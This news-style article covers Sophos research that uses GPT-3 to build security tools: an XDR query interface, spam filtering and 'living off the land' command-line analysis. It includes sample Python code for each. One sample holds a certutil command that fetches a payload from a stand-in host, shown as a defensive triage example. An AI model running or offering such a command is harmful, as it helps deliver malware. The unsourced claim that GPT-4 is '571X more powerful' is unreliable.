How ChatGPT May Act as a Copilot for Security Experts

ChatGPT simplifies the analysis of "living off the land" binaries, enhances spam filters, and quickly filters harmful behavior in XDR telemetry.

Since GPT-4 was released this week, security teams have been left to speculate about how generative AI will affect the threat landscape. While it is already well known that GPT-3 can be used to generate malware and ransomware code, GPT-4 is reportedly 571X more powerful, which could lead to a significant increase in threats. 

While the long-term effects of generative AI remain unknown, a new study presented today by cybersecurity company Sophos shows that security teams can also use GPT-3 to thwart cyberattacks. 

Younghoo Lee, principal data scientist at Sophos AI, and other Sophos researchers used GPT-3's large language models to build a natural-language query interface for hunting malicious activity across the telemetry of the XDR security tool, detecting spam emails, and examining potentially covert "living off the land" binary command lines. 
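
As a rough illustration of that last use case, the short Python sketch below shows how an analyst might ask a GPT model to triage a suspicious "living off the land" command line. This is not the Sophos prototype; the model name, the prompt wording, and the example certutil command are assumptions made purely for the example.

    from openai import OpenAI

    client = OpenAI()  # reads OPENAI_API_KEY from the environment

    # Hypothetical suspicious command line (certutil abused as a downloader).
    COMMAND_LINE = "certutil.exe -urlcache -split -f http://example.com/payload.txt payload.exe"

    prompt = (
        "You are a security analyst. Explain what the following command line does, "
        "say whether it matches a known 'living off the land' technique, and rate "
        "its risk as low, medium, or high.\n\n"
        f"Command line: {COMMAND_LINE}"
    )

    response = client.chat.completions.create(
        model="gpt-3.5-turbo",  # assumed model; the Sophos work used GPT-3 models
        messages=[{"role": "user", "content": prompt}],
        temperature=0,  # keep the triage output deterministic
    )

    print(response.choices[0].message.content)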

In general, Sophos' research suggests that generative AI has a crucial role to play in processing security events in the SOC, allowing defenders to better manage their workloads and identify threats more quickly. 

Detecting malicious activity 

The research comes as security teams increasingly struggle to handle the volume of alerts generated by tools throughout the network, with 70% of SOC teams saying that their work managing IT threat alerts is emotionally affecting their personal lives. 

According to Sean Gallagher, senior threat researcher at Sophos, one of the growing concerns within security operation centres is the sheer amount of "noise" streaming in: many businesses are working with scarce resources, and there are simply too many notifications and detections to sort through. Using tools like GPT-3, Sophos has demonstrated that it is possible to streamline certain labor-intensive processes and give defenders back valuable time. 

Utilising ChatGPT as a cybersecurity co-pilot 

In the study, the researchers built a natural-language query interface that lets a security analyst screen the data gathered by security tools for malicious activity by typing queries in plain English. 

For instance, the user can type a request such as "show me all processes that were named powershell.exe and run by the root user", and the interface generates the corresponding XDR SQL queries without the analyst needing to know the underlying database structure. 

This approach lets defenders filter data without writing query languages like SQL themselves and offers a "co-pilot" that eases the burden of manually hunting through threat data.
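
To give a feel for the idea, the following Python sketch shows one way a plain-English question could be translated into a SQL query with a GPT model. The table schema, model name, and prompt are hypothetical; Sophos' actual prototype is the version published on its GitHub.

    from openai import OpenAI

    client = OpenAI()

    # Hypothetical process-telemetry schema; real XDR schemas differ.
    SCHEMA = "processes(process_name TEXT, username TEXT, cmdline TEXT, start_time TEXT)"

    def nl_to_sql(question: str) -> str:
        """Translate an analyst's plain-English question into a SQL query."""
        prompt = (
            f"Given this table schema:\n{SCHEMA}\n\n"
            "Translate the analyst's question into a single SQL query. "
            "Return only the SQL, with no explanation.\n\n"
            f"Question: {question}"
        )
        response = client.chat.completions.create(
            model="gpt-3.5-turbo",  # assumed model
            messages=[{"role": "user", "content": prompt}],
            temperature=0,
        )
        return response.choices[0].message.content.strip()

    query = nl_to_sql(
        "show me all processes that were named powershell.exe and run by the root user"
    )
    print(query)
    # Typically yields something like:
    # SELECT * FROM processes WHERE process_name = 'powershell.exe' AND username = 'root';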

“We are already working on incorporating some of the prototypes into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments,” Gallagher stated. “In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts.” 

It is also worth noting that the researchers found GPT-3 significantly more effective at filtering threat data than the alternative machine learning models they tested, and this filtering would likely become faster still with the next generation of generative AI, given GPT-4's availability and greater processing capability. Although these pilots are still in their early stages, Sophos has published the findings of the spam-filtering and command-line analysis experiments on the SophosAI GitHub page for other organisations to adapt.
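
For readers curious about the spam-filtering side, the sketch below shows a simple few-shot spam classification prompt sent to a GPT model. The example emails and model name are assumptions for illustration; the code Sophos published on GitHub is the reference to consult.

    from openai import OpenAI

    client = OpenAI()

    # A couple of made-up labelled examples to steer the model (few-shot prompting).
    FEW_SHOT = (
        "Classify each email as SPAM or HAM.\n\n"
        "Email: Congratulations! You have won a $1000 gift card, click here to claim.\n"
        "Label: SPAM\n\n"
        "Email: Hi team, the weekly sync has moved to 3pm tomorrow.\n"
        "Label: HAM\n\n"
    )

    def classify_email(email_text: str) -> str:
        """Return the model's SPAM/HAM label for a single email body."""
        response = client.chat.completions.create(
            model="gpt-3.5-turbo",  # assumed model
            messages=[{"role": "user", "content": FEW_SHOT + f"Email: {email_text}\nLabel:"}],
            temperature=0,
            max_tokens=2,  # only the label is needed
        )
        return response.choices[0].message.content.strip()

    print(classify_email("Your account has been suspended, verify your password at this link."))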